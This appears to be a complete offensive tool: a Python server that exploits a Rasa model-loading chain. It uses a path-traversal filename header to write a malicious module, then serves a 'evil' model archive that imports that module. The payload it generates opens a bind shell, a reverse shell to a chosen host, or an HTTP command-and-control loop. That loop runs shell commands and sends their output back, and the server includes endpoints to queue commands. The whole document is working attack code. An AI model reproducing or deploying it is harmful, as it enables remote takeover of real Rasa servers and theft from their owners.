README.md
Rendering markdown...
import argparse
import base64
import datetime
import http.server
import socketserver
import urllib.parse
from pathlib import Path
from typing import Dict, List, Optional
BASE_DIR = Path(__file__).resolve().parent
DEFAULT_EVIL_MODEL = BASE_DIR / "evil_import_model.tar.gz"
def build_pwnmod(
mode: str,
bind_port: int,
reverse_host: Optional[str],
reverse_port: Optional[int],
c2_base_url: Optional[str],
) -> bytes:
"""Build pwnmod.py payload for the Rasa graph import chain.
Returns bytes ready to be served as the write-module response body.
"""
# Per-mode imports and bootstrap
if mode == "bind":
imports = """import os
import pty
import socket
import threading
import time"""
bootstrap = f"""
def _launch():
# Target listens on {bind_port}. Useful when the port is reachable.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(("0.0.0.0", {bind_port}))
s.listen(1)
while True:
conn, _ = s.accept()
pid = os.fork()
if pid == 0:
try:
s.close()
os.dup2(conn.fileno(), 0)
os.dup2(conn.fileno(), 1)
os.dup2(conn.fileno(), 2)
pty.spawn("/bin/sh")
finally:
os._exit(0)
conn.close()
"""
elif mode == "reverse":
if not reverse_host or not reverse_port:
raise SystemExit("reverse mode requires --reverse-host and --reverse-port")
imports = """import os
import pty
import socket
import threading
import time"""
bootstrap = f"""
def _launch():
# Target connects back. Best for Docker/NAT environments.
while True:
s = None
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("{reverse_host}", {reverse_port}))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
pty.spawn("/bin/sh")
except Exception:
pass
finally:
try:
if s:
s.close()
except Exception:
pass
time.sleep(5)
"""
elif mode == "c2":
if not c2_base_url:
raise SystemExit("c2 mode requires --c2-base-url")
imports = """import base64
import os
import pty
import socket
import subprocess
import threading
import time
import urllib.parse
import urllib.request"""
bootstrap = f"""
def _launch():
# HTTP polling C2. Reuses the same outbound HTTP path as model fetch.
agent = socket.gethostname()
while True:
try:
poll_url = "{c2_base_url}/poll?agent=" + urllib.parse.quote(agent)
cmd = urllib.request.urlopen(poll_url, timeout=20).read().decode("utf-8", "ignore").strip()
if cmd:
proc = subprocess.Popen(
["/bin/sh", "-c", cmd],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
out, _ = proc.communicate(timeout=60)
data = urllib.parse.urlencode({{
"agent": agent,
"cmd": cmd,
"output_b64": base64.b64encode(out).decode(),
}}).encode()
urllib.request.urlopen(
urllib.request.Request(
"{c2_base_url}/result",
data=data,
headers={{"Content-Type": "application/x-www-form-urlencoded"}},
method="POST",
),
timeout=20,
).read()
except Exception:
pass
time.sleep(3)
"""
else:
raise SystemExit(f"unknown mode: {mode}")
payload = f"""{imports}
{bootstrap}
# Import side-effect: Rasa imports pwnmod before it uses Pwn.
threading.Thread(target=_launch, daemon=True).start()
class Pwn:
@classmethod
def load(cls, config=None, model_storage=None, resource=None, execution_context=None, **kwargs):
return cls()
@staticmethod
def get_default_config():
return {{}}
def provide(self, **kwargs):
return None
"""
return payload.encode("utf-8")
class Handler(http.server.BaseHTTPRequestHandler):
server_version = "RasaStage2/1.0"
def do_GET(self) -> None:
parsed = urllib.parse.urlparse(self.path)
query = urllib.parse.parse_qs(parsed.query)
if parsed.path.startswith("/write-module"):
# Stage 1: path traversal via filename header writes /app/pwnmod.py
self.server.hits.append(self._hit("write-module"))
self._send_file(
self.server.pwnmod,
"text/plain; charset=utf-8",
self.server.module_filename,
"stage2-write-module",
)
return
if parsed.path.startswith("/model"):
# Stage 2: serve the evil model whose metadata.json imports pwnmod.Pwn
self.server.hits.append(self._hit("model"))
self._send_file(
self.server.evil_model.read_bytes(),
"application/x-tar",
self.server.tar_filename,
"stage2-evil-model",
)
return
# ---- C2 management endpoints ----
if parsed.path.startswith("/poll"):
agent = query.get("agent", [None])[0]
if agent is None:
# Anonymous poll — never consume from wildcard queue.
# Only real agents (that know their hostname) get commands.
self.server.hits.append(self._hit("poll anonymous (no agent param)"))
self._send_file(b"", "text/plain; charset=utf-8", "cmd.txt", "poll")
return
cmd = self.server.pending_cmds.pop(agent, self.server.pending_cmds.pop("*", ""))
self.server.hits.append(self._hit(f"poll agent={agent} cmd={cmd!r}"))
self._send_file(cmd.encode("utf-8"), "text/plain; charset=utf-8", "cmd.txt", "poll")
return
if parsed.path.startswith("/enqueue"):
agent = query.get("agent", ["*"])[0]
cmd = query.get("cmd", [""])[0]
self.server.pending_cmds[agent] = cmd
self.server.hits.append(self._hit(f"enqueue agent={agent} cmd={cmd!r}"))
self._send_file(b"ok\n", "text/plain; charset=utf-8", "enqueue.txt", "enqueue")
return
if parsed.path.startswith("/last"):
agent = query.get("agent", ["default"])[0]
body = self.server.results.get(agent, "")
self.server.hits.append(self._hit(f"last agent={agent}"))
self._send_file(body.encode("utf-8"), "text/plain; charset=utf-8", "result.txt", "last")
return
if parsed.path.startswith("/agents"):
body = "\n".join(sorted(self.server.results.keys())) + "\n"
self.server.hits.append(self._hit("agents"))
self._send_file(body.encode("utf-8"), "text/plain; charset=utf-8", "agents.txt", "agents")
return
if parsed.path.startswith("/hits"):
body = "\n".join(self.server.hits).encode("utf-8") + b"\n"
self._send_file(body, "text/plain; charset=utf-8", "hits.txt", "hits")
return
if parsed.path.startswith("/healthz"):
self._send_file(b"ok\n", "text/plain; charset=utf-8", "healthz.txt", "healthz")
return
self.send_response(404)
self.end_headers()
self.wfile.write(b"not found\n")
def do_POST(self) -> None:
parsed = urllib.parse.urlparse(self.path)
if not parsed.path.startswith("/result"):
self.send_response(404)
self.end_headers()
self.wfile.write(b"not found\n")
return
# C2 agent posts command output here.
length = int(self.headers.get("Content-Length", "0"))
body = self.rfile.read(length)
form = urllib.parse.parse_qs(body.decode("utf-8", "ignore"))
agent = form.get("agent", ["default"])[0]
cmd = form.get("cmd", [""])[0]
output_b64 = form.get("output_b64", [""])[0]
try:
output = base64.b64decode(output_b64).decode("utf-8", "replace")
except Exception:
output = "<decode failed>"
self.server.results[agent] = f"$ {cmd}\n{output}"
self.server.hits.append(self._hit(f"result agent={agent} cmd={cmd!r}"))
self._send_file(b"ok\n", "text/plain; charset=utf-8", "result_ack.txt", "result")
def _hit(self, route: str) -> str:
ts = datetime.datetime.now(datetime.timezone.utc).isoformat(timespec="seconds") + "Z"
return f"{ts} {self.client_address[0]} {self.command} {self.path} {route}"
def _send_file(self, body: bytes, content_type: str, filename: str, etag: str) -> None:
self.send_response(200)
self.send_header("Content-Type", content_type)
self.send_header("Content-Length", str(len(body)))
self.send_header("ETag", etag)
self.send_header("filename", filename)
self.end_headers()
self.wfile.write(body)
def log_message(self, fmt: str, *args) -> None:
print(f"{self.address_string()} - {fmt % args}", flush=True)
class ThreadingTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
allow_reuse_address = True
# Instance attributes (set in main)
pwnmod: bytes
evil_model: Path
module_filename: str
tar_filename: str
hits: List[str]
pending_cmds: Dict[str, str]
results: Dict[str, str]
def main() -> None:
parser = argparse.ArgumentParser(
description="Minimal Rasa stage2 model server — serves path-traversal write + evil model"
)
parser.add_argument("--listen", default="0.0.0.0", help="Bind address (default: 0.0.0.0)")
parser.add_argument("--port", type=int, default=8000, help="Listen port (default: 8000)")
parser.add_argument(
"--mode", "--model",
choices=["bind", "reverse", "c2"],
default="reverse",
help="Payload mode: bind shell, reverse shell, or HTTP C2 polling (default: reverse)",
)
parser.add_argument("--bind-port", type=int, default=4444, help="Port for bind shell (bind mode)")
parser.add_argument("--reverse-host", help="Callback IP/hostname (reverse mode)")
parser.add_argument("--reverse-port", type=int, help="Callback port (reverse mode)")
parser.add_argument("--c2-base-url", help="C2 poll base URL (c2 mode)")
parser.add_argument("--evil-model", type=Path, default=DEFAULT_EVIL_MODEL,
help="Path to evil model tar.gz")
parser.add_argument("--module-filename", default="../../app/pwnmod.py",
help="Path-traversal filename for the write-module stage "
"(default: ../../app/pwnmod.py)")
parser.add_argument("--tar-filename", default="evil_import_model.tar.gz",
help="Filename header value for the model stage "
"(default: evil_import_model.tar.gz)")
args = parser.parse_args()
if not args.evil_model.exists():
raise SystemExit(f"missing evil model archive: {args.evil_model}")
pwnmod = build_pwnmod(
args.mode,
args.bind_port,
args.reverse_host,
args.reverse_port,
args.c2_base_url,
)
with ThreadingTCPServer((args.listen, args.port), Handler) as httpd:
httpd.pwnmod = pwnmod
httpd.evil_model = args.evil_model
httpd.module_filename = args.module_filename
httpd.tar_filename = args.tar_filename
httpd.hits = []
httpd.pending_cmds = {}
httpd.results = {}
base = f"http://{args.listen}:{args.port}"
print(f"listening: {base}", flush=True)
print(f"mode: {args.mode}", flush=True)
print(f"stage-1: {base}/write-module -> filename: {args.module_filename}", flush=True)
print(f"stage-2: {base}/model -> filename: {args.tar_filename}", flush=True)
if args.mode == "bind":
print(f"bind shell: 0.0.0.0:{args.bind_port}", flush=True)
elif args.mode == "reverse":
print(f"reverse: {args.reverse_host}:{args.reverse_port}", flush=True)
else:
print(f"c2 poll: {args.c2_base_url}/poll", flush=True)
print(f"enqueue: {base}/enqueue?cmd=id", flush=True)
try:
httpd.serve_forever()
except KeyboardInterrupt:
print("\nshutting down", flush=True)
if __name__ == "__main__":
main()